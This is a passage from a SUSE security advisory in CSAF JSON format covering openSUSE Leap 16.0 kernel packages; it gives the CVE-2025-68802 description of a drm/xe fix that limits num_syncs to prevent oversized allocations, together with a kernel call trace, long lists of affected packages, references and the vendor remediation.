"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68802"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68802",
"url": "https://www.suse.com/security/cve/CVE-2025-68802"
},
{
"category": "external",
"summary": "SUSE Bug 1256661 for CVE-2025-68802",
"url": "https://bugzilla.suse.com/1256661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
